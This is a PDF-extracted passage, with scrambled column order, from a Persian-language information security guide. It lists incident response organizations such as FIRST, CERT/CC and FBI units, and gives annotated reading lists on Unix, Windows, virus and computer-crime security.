‫ﺍﻳﺠﺎﺩ ﺍﺑـﺰﺍﺭﻱ ﺑـﺮﺍﻱ ﺁﮔـﺎﻩﺳـﺎﺯﻱ ﻭ ﺍﻋـﻼﻥ ﻫـﺸﺪﺍﺭ ﺑـﻪ‬ ‫•‬ ‫‪Washington, DC 20530‬‬
‫ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭ ﺧﺼﻮﺹ ﺭﺧﺪﺍﺩﻫﺎ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﻓﺰﺍﻳﻨﺪﻩ؛‬ ‫‪+1-202-514-1026‬‬
‫‪http://www.cybercirne.gov‬‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﻭ ﮔﺴﺘﺮﺵ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﻴﻤﻬﺎﻱ ﻭﺍﻛﻨﺶ ﻋﻀﻮ ﺑـﺎ‬ ‫•‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﭼﻮﻥ ﺗﺤﻘﻴﻘﺎﺕ ﻭ ﻛﺎﺭﻫﺎﻱ ﻋﻤﻠﻲ؛ ﻭ‬ ‫‪٥٤٤‬‬
‫‪) FBI‬ﺍﺩﺍﺭﺓ ﺗﺠﺴﺲ ﻣﻠﻲ(‬
‫ﺗﺸﻮﻳﻖ ﻭ ﺗﺴﻬﻴﻞ ﺑﻪﺍﺷﺘﺮﺍﻙﮔﺬﺍﺭﻱ ﺍﻃﻼﻋـﺎﺕ‪ ،‬ﺍﺑﺰﺍﺭﻫـﺎ ﻭ‬ ‫•‬
‫ﻓﻨﻮﻥ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ‪.‬‬ ‫‪٥٤٥‬‬
‫ﻣﻠـﻲ )‪FBI ، (NIPC‬‬ ‫ﻋﻼﻭﻩ ﺑﺮ ﻣﺮﻛﺰ ﺣﻔﺎﻇﺖ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ‬
‫ﻣﺮﻛــﺰ ‪ - Infraguard‬ﻣﺠﻤﻮﻋــﻪﺍﻱ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬــﺎﻱ ﻫﻤﻜــﺎﺭﺍﻥ‬
‫‪ FIRST‬ﻫﺮﺳﺎﻝ ﻳﻚ ﻛﺎﺭﮔﺎﻩ ﺩﺭ ﺧﺼﻮﺹ ﺑﺎ ﻭﺍﻛﻨﺶ ﺑﻪ ﻭﻗـﺎﻳﻊ‬
‫ﻣﻨﻄﻘﻪﺍﻱ ﻛﻪ ‪ FBI‬ﻭ ﺍﻗﺘﺼﺎﺩ ﻣﺤﻠﻲ ﺭﺍ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ ﺟـﺮﺍﺋﻢ‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

‫ﺍﻣﻨﻴﺘﻲ ﺑﺮﮔﺰﺍﺭ ﻣﻲ ﻛﻨـﺪ ﻛـﻪ ﺷـﺎﻣﻞ ﻣﻄﺎﻟـﺐ ﺁﻣﻮﺯﺷـﻲ ﻭ ﺍﺭﺍﺋـﻪ‬


‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﻤﺎﻫﻨﮓ ﻣﻲﻛﻨﺪ ‪ -‬ﺭﺍ ﻧﻴﺰ ﺍﺩﺍﺭﻩ ﻣﻲﻧﻤﺎﻳـﺪ‪ .‬ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﻄﺎﻟﺐ ﺗﻮﺳﻂ ﺍﻋﻀﺎﻱ ﺗﻴﻤﻬﺎﻱ ﻭﺍﻛـﻨﺶ ﻭ ﻧﻴـﺰ ﺩﻭﺍﻳـﺮ ﺍﺟـﺮﺍﻱ‬
‫ﺑﻴﺸﺘﺮ ﺩﺭ ﺧﺼﻮﺹ ‪ Infraguard‬ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ ﺩﺭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ‬
‫ﻗﻮﺍﻧﻴﻦ ﺍﺳﺖ‪ .‬ﺍﻳـﻦ ﻣﺆﺳـﺴﻪ ﺩﺭ ﺍﻭﺍﺳـﻂ ﺳـﺎﻝ ‪ ۱۹۹۵‬ﺑـﻪ ﻳـﻚ‬
‫‪ NIPC‬ﻳﺎﻓﺖ‪.‬‬

‫‪546 U.S. Secret Service‬‬ ‫‪543 Department of Justice‬‬


‫‪547 Forum of Incident and Response Security Teams‬‬ ‫‪544 Federal Bureau Of Investigation‬‬
‫‪545 National Infrastructure Protection Center‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٩٤‬‬

‫ﻣﻴﺰﺑﺎﻧﻬﺎﻱﺍﻳﻨﺘﺮﻧﺘﻲ‪ ،‬ﺑﺮﺩﺍﺷﺘﻪ ﮔﺎﻣﻬﺎﻱ ﻣﺆﺛﺮ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺳـﻄﺢ‬ ‫ﻣﺆﺳﺴﻪ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺗﺒﺪﻳﻞ ﺷـﺪ ﻭ ﻭﻇـﺎﻳﻒ ﺩﺑﻴﺮﺧﺎﻧـﻪﺍﻱ ﺁﻥ ﺍﺯ‬
‫ﺁﮔﺎﻫﻲ ﭘﻴﺮﺍﻣﻮﻥ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﻭ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ‬ ‫‪ NIST‬ﺗﻔﻜﻴﻚ ﮔﺮﺩﻳﺪ‪.‬‬
‫ﺩﺭ ﺟﻬﺖ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺘﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﻣـﻲﺑﺎﺷـﺪ‪.‬‬
‫‪FIRST Secretariats‬‬
‫ﺑﺎﻳﮕﺎﻧﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻭﺏ ﺍﻳﻦ ﻣﺮﻛﺰ )‪ (http://www.cert.org‬ﺷﺎﻣﻞ‬ ‫‪First.Org, Inc.‬‬
‫ﻳﻚ ﻣﺠﻤﻮﻋﺔ ﻏﻨﻲ ﺍﺯ ﻫﺸﺪﺍﺭﻫﺎﻱ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﮔﺬﺷـﺘﻪ‬ ‫‪PMB 349‬‬
‫‪650 Castro Street, Suite 120‬‬
‫ﻭ ﺣﺎﻝ ﺣﺎﺿﺮ ﻣﻲﺑﺎﺷﺪ‪.‬‬ ‫‪Mountain View, CA 94041‬‬
‫‪first-sec@first.org‬‬
‫‪CERT Coordination Center‬‬ ‫‪http://www.first.org/‬‬
‫‪Software Engineering Institute‬‬
‫‪Carnegi Mellon University‬‬ ‫‪ FIRST‬ﻣﺘﺸﻜﻞ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺍﺳﺖ‪ .‬ﺑـﺮﺍﻱ ﻣـﺸﺎﻫﺪﺓ‬
‫‪Pittsburgh, PA 15213-3890‬‬ ‫ﺟﺪﻳﺪﺗﺮﻳﻦ ﻓﻬﺮﺳﺖ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻋـﻀﻮ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺍﻳﻨﺘﺮﻧـﺖ‬
‫‪+1-412-268-7090‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﻳـﻚ ﻣـﺸﻜﻞ ﺍﻣﻨﻴﺘـﻲ ﺩﺍﺭﻳـﺪ ﻭ ﻳـﺎ‬
‫‪cert@cert.org‬‬
‫ﻧﻴﺎﺯﻣﻨﺪ ﻛﻤﻚ ﻫﺴﺘﻴﺪ‪ ،‬ﺍﺑﺘﺪﺍ ﺑﺒﻴﻨﻴﺪ ﻛـﺪﺍﻣﻴﻚ ﺍﺯ ﺍﻳـﻦ ﺳـﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻣﺮﺑﻮﻁ ﺑﻪ ﻋﻤﻠﻴﺎﺕ ﻭ ﻧﻴﺎﺯﻫﺎﻱ ﺷﻤﺎ ﻣﻲﺷﻮﻧﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﻣﻮﻓﻖ ﺑـﻪ‬
‫ﺗﺸﺨﻴﺺ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻧﺸﺪﻳﺪ‪ ،‬ﺑﺎ ﻳﻜﻲ ﺍﺯ ﺁﻧﻬﺎ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳـﺪ ﺗـﺎ‬
‫ﺁﻧﻬﺎ ﻣﻨﺎﺳﺐﺗﺮﻳﻦ ﮔﺮﻭﻩ ﺭﺍ ﺑﻪ ﺷﻤﺎ ﻣﻌﺮﻓﻲ ﻛﻨﻨﺪ‪.‬‬

‫ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎﻱ ﻭﺍﻛﻨﺶ ﺩﺍﺭﺍﻱ ﻳﻚ ﻛﻠﻴﺪ ‪ PGP‬ﻫـﺴﺘﻨﺪ‬


‫ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﺁﻥ ﻫﺸﺪﺍﺭﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺍﻣﻀﺎ ﺭﺳﺎﻧﻨﺪ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ‬
‫ﻗﺎﺩﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﮔﺰﺍﺭﺷﻬﺎ ﺭﺍ ﺑـﺼﻮﺭﺕ ﻣﺤﺮﻣﺎﻧـﻪ ﺑـﺮﺍﻱ‬
‫ﺁﻧﻬﺎ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ‪:‬‬
‫‪http://www.first.org/rep-info/‬‬

‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺗﻴﻤﻬﺎ ﺗﺮﺗﻴﺒﻲ ﺍﺗﺨﺎﺫ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺗﻠﻔﻨﻬﺎﻱ‬


‫ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻃﻮﻝ ﺗﻤﺎﻡ ‪ ۲۴‬ﺳﺎﻋﺖ ﺷﺒﺎﻧﻪﺭﻭﺯ ﻭ ﺩﺭ ﻫﺮ ‪ ۷‬ﺭﻭﺯ ﻫﻔﺘﻪ‬
‫ﭘﺎﺳﺦ ﺩﻫﻨﺪ‪.‬‬

‫ﻣﺮﻛﺰ ﻫﻤﺎﻫﻨﮕﻲ ﺗﻴﻢ ﻭﺍﻛﻨﺶ ﺑﻪ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬


‫‪٥٤٨‬‬
‫)‪(CERT/CC‬‬

‫ﻳﻜﻲ ﺍﺯ ﺗﻴﻤﻬﺎﻱ ﻣﻬﻢ ‪ ،FIRST‬ﮔﺮﻭﻩ ‪ CERT/CC‬ﺍﺳﺖ ﻛـﻪ‬


‫ﺑﻪ ﺗﻤﺎﻣﻲ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺧﺪﻣﺎﺕﺭﺳﺎﻧﻲ ﻣـﻲ ﻛﻨـﺪ‪ .‬ﻛﻠﻤـﺔ‬
‫‪ CERT‬ﺑﺮﮔﺮﻓﺘﻪ ﺍﺯ ﻧﺎﻡ "ﺗﻴﻢ ﻭﺍﻛﻨﺶ ﺑﻪ ﻓﻮﺭﻳﺘﻬـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ"‬
‫ﺍﺳـﺖ ﻛـﻪ ﺗﻮﺳـﻂ ﻣﺆﺳـﺴﻪ ﭘـﺮﻭﮊﻩﻫـﺎﻱ ﺗﺤﻘﻴﻘـﺎﺗﻲ ﭘﻴـﺸﺮﻓﺘﻪ‬
‫‪٥٤٩‬‬
‫)‪ (ARPA‬ﺩﺭ ﻧﻮﺍﻣﺒﺮ ‪) ۱۹۸۸‬ﻫﻨﮕﺎﻡ ﺷﻴﻮﻉ ﺍﻭﻟﻴﺔ ﻛﺮﻣﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻭ‬
‫ﺭﺧــﺪﺍﺩﻫﺎﻱ ﻣــﺸﺎﺑﻪ( ﺗــﺸﻜﻴﻞ ﺷــﻜﻞ ﮔﺮﻓﺘــﻪ ﺑــﻮﺩ‪ .‬ﻣﺄﻣﻮﺭﻳــﺖ‬
‫‪ CERT/CC‬ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﻣﺠﺎﻣﻊ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺮﺍﻱ ﺗﺴﻬﻴﻞ ﻧﺤﻮﺓ‬
‫ﻭﺍﻛـــﻨﺶ ﺑـــﻪ ﺭﺧـــﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـــﻲ ﺭﺍﻳﺎﻧـــﻪ ﺍﺯ ﺟﻤﻠـــﻪ‬

‫‪548 Computer Emergency Response Team /‬‬


‫‪Coordination Center‬‬
‫‪549 Advanced Research Projects Agency‬‬
‫‪٤٩٥‬‬ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫ﻣﺮﺍﺟﻊ ﺍﻣﻨﻴﺘﻲ ‪Unix‬‬

‫ﺍﻳــﻦ ﺩﺳــﺘﻪ ﺍﺯ ﻛﺘﺎﺑﻬــﺎ ﺑــﺮ ﻣــﺴﺎﺋﻞ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺩﺭ‬


‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Unix‬ﺗﺄﻛﻴﺪ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﭘﻴﻮﺳﺖ ‪۵‬‬
‫‪Garfinkel, Simson, Gene Spafford, and Alan‬‬
‫‪Schwartz. Practical Unix and Internet‬‬
‫‪Security, 3rd Edition.Cambridge, MA:‬‬
‫ﻣﻨﺎﺑﻊ ﭼﺎﭘﻲ‬
‫‪O’Reilly and Associates, Inc., 2003.‬‬
‫ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﻛﺘﺎﺑﻬﺎ‪ ،‬ﻣﺠﻼﺕ ﻭ ﻣﻘﺎﻻﺕ ﺑـﺴﻴﺎﺭﻱ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺭﺳﺎﻟﺔ ﺍﺻﻠﻲ ﻭ ﺍﻭﻟﻴـﺔ ﺍﻣﻨﻴـﺖ ﺩﺭ ‪ Unix‬ﻛـﻪ ﻫﻨـﻮﺯ ﻫـﻢ ﺍﺭﺯﺵ‬ ‫ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺘﺸﺮ ﺷﺪﻩ ﻛﻪ ﺑﻴﺎﻧﮕﺮ ﺗﻮﺟﻪ ﺭﻭﺯﺍﻓﺰﻭﻥ ﺑـﻪ ﺍﻳـﻦ‬
‫ﺧﻮﺍﻧﺪﻥ ﺭﺍ ﺩﺍﺭﺩ‪:‬‬ ‫ﻣﻮﺿﻮﻉ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻣﺤﻘﻖ ﺩﺍﻧﺶ ﺧـﻮﺩ‬
‫ﺭﺍ ﺑﻪﺭﻭﺯ ﻧﮕﻪ ﺩﺍﺭﻳﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻄﺎﻟﻌـﻪ ﻭ ﻓﺮﺍﮔﻴـﺮﻱ ﻗـﺴﻤﺖ‬
‫‪Grampp, F. T., and R. H. Morris. UNIX‬‬
‫‪Operating SystemSecurity, AT&T Bell‬‬ ‫ﻛﻤﻲ ﺍﺯ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﻧﻴﺰ ﺑﺴﻴﺎﺭ ﻃﺎﻗـﺖﻓﺮﺳـﺎ ﺑﺎﺷـﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺠـﺎ‬
‫‪Laboratories Technical Journal, October‬‬ ‫ﺍﻃﻼﻋﺎﺗﻲ ﺍﺯ ﻣﺮﺍﺟﻊ ﻣﻔﻴﺪ ﻣﺨﺘﻠﻒ ﺟﻤﻊﺁﻭﺭﻱ ﺷﺪﻩ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧـﺪ‬
‫‪1984.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻧﻘﻄﺔ ﺷﺮﻭﻋﻲ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻃﻼﻋـﺎﺕ ﺍﻓﺰﻭﻧﺘـﺮ ﻭ‬
‫ﻳﻚ ﺑﺮﺭﺳﻲ ﺧﻮﺏ ﺍﺯ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ‪ Unix‬ﻫﻨﮕﺎﻡ ﺷﺒﻜﻪﺳﺎﺯﻱ‬ ‫ﻋﻤﻴﻖﺗﺮ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺭﺍﻫﻨﻤﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻣﺪﺍﺩﺭﺳﺎﻧﻲ ﺑﻴـﺸﺘﺮ ﻣـﻮﺭﺩ‬
‫ﻣﺒﺘﻨﻲ ﺑﺮ ‪:TCP/IP‬‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﺷﻤﺎ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪.‬‬

‫‪Wood, Patrick H., and Stephen G. Kochan.‬‬ ‫ﺳﻌﻲ ﻣﺎ ﺑﺮ ﺍﻳﻦ ﺑﻮﺩﻩ ﻛﻪ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﺭﺍ ﺑﻪ ﻣﺮﺍﺟﻊ ﺩﺭ ﺩﺳـﺘﺮﺱ‬
‫‪UNIX System Security, Carmel, IN: Hayden‬‬ ‫ﻭ ﺍﺭﺯﺷﻤﻨﺪﺗﺮ ﻣﺤﺪﻭﺩ ﻛﻨﻴﻢ ﺗﺎ ﻳﺎﻓﺘﻦ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﺩﺷﻮﺍﺭ‬
‫‪Books, 1986.‬‬
‫ﻧﺒﺎﺷﺪ‪ .‬ﻭﺟﻮﺩ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻣﺮﺍﺟﻊ ﺩﺭ ﺍﻳﻦ ﻓﻬﺮﺳـﺖ‪ ،‬ﺑـﻴﺶ ﺍﺯ ﻫـﺮ‬
‫ﻣﺮﺍﺟﻊ ﺍﻣﻨﻴﺘﻲ ‪Windows‬‬ ‫ﺩﻟﻴﻠﻲ‪ ،‬ﺑﻪ ﺩﻟﻴﻞ ﺗﺎﺭﻳﺨﻲ ﺑﻮﺩﻥ ﺁﻧﻬﺎ ﺍﺳـﺖ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺁﻧﺠـﺎ ﻛـﻪ‬
‫ﺑﻨﻈﺮ ﺭﺳﻴﺪﻩ ﺗﻮﺿﻴﺢ ﺍﺿﺎﻓﻪﺗﺮ ﺑﻪ ﺧﻮﺍﻧﻨﺪﻩ ﻛﻤﻚ ﻣﻲﻛﻨـﺪ‪ ،‬ﺍﺯ ﺁﻥ‬
‫ﻳﻚ ﺭﺍﻫﻨﻤﺎﻱ ﻋﺎﻟﻲ ﺑﺮﺍﻱ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩﺍﻳﻢ‪.‬‬
‫‪ Windows NT‬ﻛــﻪ ﺑــﺮﺍﻱ ﺍﺭﺍﺋــﻪ ﺧــﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘــﻲ ﺑﻜــﺎﺭ‬
‫ﻣﻲﺭﻭﻧﺪ‪:‬‬ ‫ﭼﻨﺎﻧﭽﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻳﻚ ﻗﻔﺴﻪ ﻛﺘـﺎﺏ ﺩﺭ ﻣـﻮﺭﺩ ﺍﻣﻨﻴـﺖ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻴﺪ‪ ،‬ﭘﻴﺸﻨﻬﺎﺩ ﻣﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭘﻴﺶ ﺍﺯ ﺗـﺼﻤﻴﻢﮔﻴـﺮﻱ ﺑـﺮﺍﻱ‬
‫‪Norberg, Stefan. Securing Windows‬‬ ‫ﺧﺮﻳــﺪ ﻛﺘﺎﺑﻬــﺎﻳﻲ ﻛــﻪ ﻋﻨــﺎﻭﻳﻦ ﺁﻧﻬــﺎ ﺟــﺬﺍﺏ ﺍﺳــﺖ‪ ،‬ﺍﺯ ﻳــﻚ‬
‫‪NT/2000 Servers for the Internet: A‬‬
‫‪Checklist for System Administrators.‬‬ ‫ﻛﺘﺎﺑﻔﺮﻭﺷﻲ ﺗﺨﺼﺼﻲ ﺑﺎﺯﺩﻳﺪ ﺑﻌﻤﻞ ﺁﻭﺭﻳـﺪ‪ ،‬ﺑـﺎ ﻳـﻚ ﻓﺮﻭﺷـﻨﺪﺓ‬
‫‪Cambridge, MA: O’Reilly and Associates,‬‬ ‫ﻛﺘﺎﺏ ﺩﺭ ﻳﻚ ﻛﻨﻔﺮﺍﻧﺲ ﺍﻣﻨﻴﺘـﻲ ﻣﻼﻗـﺎﺕ ﻛﻨﻴـﺪ ﻭ ﻳـﺎ ﺧﻼﺻـﺔ‬
‫‪2002.‬‬
‫ﻛﺘﺎﺑﻬﺎ ﺭﺍ ﺩﺭ ﺍﺗﺎﻗﻬﺎﻱ ﻣﺠﺎﺯﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻣﻄﺎﻟﻌـﻪ‬
‫‪Anderson-Redick, Stacey. Windows System‬‬ ‫ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻳﻦ ﺣﻮﺯﻩ ﺑﻪﺳﺮﻋﺖ ﺩﺭﺣﺎﻝ ﭘﻴـﺸﺮﻓﺖ ﻭ ﺗﻜﺎﻣـﻞ ﺍﺳـﺖ‪.‬‬
‫‪Policy Editor. Sebastopol, CA: O’Reilly and‬‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻭﻗﺖ ﺧﻮﺩ ﺭﺍ ﺻﺮﻑ ﺍﺷﻜﺎﻻﺕ ﻭ ﻭﺻﻠﻪﻫﺎ ﻣﻲﻛﻨﻴﺪ‪،‬‬
‫‪Associates, 2000.‬‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

‫ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ ﻛﻪ ﻫﻤﭽﻨﺎﻥ ﺑﺎ ﺍﻧﺠﺎﻡ ﻣﻄﺎﻟﻌﺎﺕ‪ ،‬ﺩﺍﻧﺶ ﺧﻮﺩ ﺭﺍ‬


‫ﺳﺎﻳﺮ ﻣﺮﺍﺟﻊ ﺍﻣﻨﻴﺘﻲ‬ ‫ﻧﻴﺰ ﺑﻪﺭﻭﺯ ﻧﮕﻪ ﺩﺍﺭﻳﺪ‪.‬‬

‫ﻛﺘﺎﺑﻬﺎ ﻭ ﻣﻘﺎﻻﺕ ﺯﻳﺮ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻫﻤﺔ ﻛﺴﺎﻧﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻘﻮﻟﺔ‬


‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻳﺸﺎﻥ ﺟﺬﺍﺏ ﺍﺳﺖ‪:‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٩٦‬‬

‫ﻭﻳﺮﻭﺳﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺑﺮﻧﺎﻣﻪﺍﻱ‬ ‫ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﻗﺎﻧﻮﻥ‬

‫ﺗﻤﺎﻡ ﻣﻮﺿﻮﻉ ﺷﻤﺎﺭﺓ ﺯﻳﺮ ﻧﺸﺮﻳﺔ ‪ ACM‬ﺑﻪ ﻣﻮﺿﻮﻋﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ‬ ‫ﺩﺍﺳﺘﺎﻧﻲ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺟﺮﻡ ﺑﺰﺭﮒ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺗﻤﺎﻡ ﺁﻥ ﺑﻮﺳﻴﻠﺔ‬
‫ﺭﺧﺪﺍﺩﻱ ﻛﻪ ﻳﻚ ﻛﺮﻡ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﺴﺒﺐ ﺁﻥ ﺑﻮﺩ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺭﺩ‪:‬‬ ‫ﺩﻭ ﻧﻔﺮ ﺑﻪ ﺍﻧﺠﺎﻡ ﺭﺳﻴﺪﻩ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﺑﺎﻋﺚ ﺷﺪ ﺟﻮﺧﺔ ﺟـﺮﺍﺋﻢ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ ،FBI‬ﭼﻨﺪ ﺗﻴﻢ ‪ ،FIRST‬ﻭ ﻧﻴـﺰ ﺍﺑـﺰﺍﺭ ‪ Tripwire‬ﺩﺭ‬
‫‪Communications of the ACM, Volume 32,‬‬
‫‪Number 6, June 1989 (the entire issue).‬‬ ‫ﺩﺍﻧﺸﮕﺎﻩ ‪ Purdue‬ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ‪:‬‬

‫ﻛﺘﺎﺏ ﺯﻳﺮ ﺩﺭﻭﺍﻗﻊ ﺑﻬﺘـﺮﻳﻦ ﻛﺘـﺎﺑﻲ ﺑـﻮﺩ ﻛـﻪ ﺟﻨﺒـﻪﻫـﺎﻱ ﻓﻨـﻲ‬ ‫‪Freedman, David H., and Charles C. Mann.‬‬
‫‪@Large; NYC, NY, 1997.‬‬
‫ﻭﻳﺮﻭﺳﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺑﻮﺩ ﻭ ﺑﺨﻮﺑﻲ ﻧﻴـﺰ‬
‫ﺩﺭ ﺩﺳــﺘﺮﺱ ﻗــﺮﺍﺭ ﺩﺍﺷــﺖ‪ ،‬ﺍﻣــﺎ ﺩﺭ ﺁﻥ ﺳــﺨﻨﻲ ﺍﺯ ﻭﻳﺮﻭﺳــﻬﺎﻱ‬ ‫ﻳﻚ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻣﺸﻬﻮﺭ ﺍﺯ ﻳﻚ ﻛﺘﺎﺏ ﺁﻣﻮﺯﺷﻲ ‪ FBI‬ﻛﻪ ﻫﺮﭼﻨﺪ‬
‫‪Macro‬ﻫﺎ ﺑﻪ ﻣﻴﺎﻥ ﻧﻴﺎﻣﺪﻩ ﺍﺳﺖ‪:‬‬ ‫ﻗﺪﻳﻤﻲ ﺍﺳﺖ ﻭﻟﻲ ﻫﻨﻮﺯ ﻣﻄﺎﻟﺐ ﺍﺭﺯﺷﻤﻨﺪﻱ ﺩﺭ ﺁﻥ ﭘﻴﺪﺍ ﻣﻲﺷﻮﺩ‪:‬‬

‫‪Ferbrache, David. The Pathology of‬‬ ‫‪Icove, David, Karl Seger, and William‬‬
‫‪Computer Viruses. London, England:‬‬ ‫‪VonStorch, Computer Crime: A‬‬
‫‪Springer- Verlag, 1992.‬‬ ‫‪Crimefighter’s Handbook, Sebastopol, CA:‬‬
‫‪O’Reilly & Associates, 1995.‬‬
‫ﻣﺠﻤﻮﻋﺔ ﺟﺎﻣﻌﻲ ﺍﺯ ﻣﻄﺎﻟﺐ ﻣﺮﺑﻮﻁ ﺑﻪ ﻭﻳﺮﻭﺳـﻬﺎ‪ ،‬ﻛﺮﻣﻬـﺎ ﻭ ﻧﻴـﺰ‬
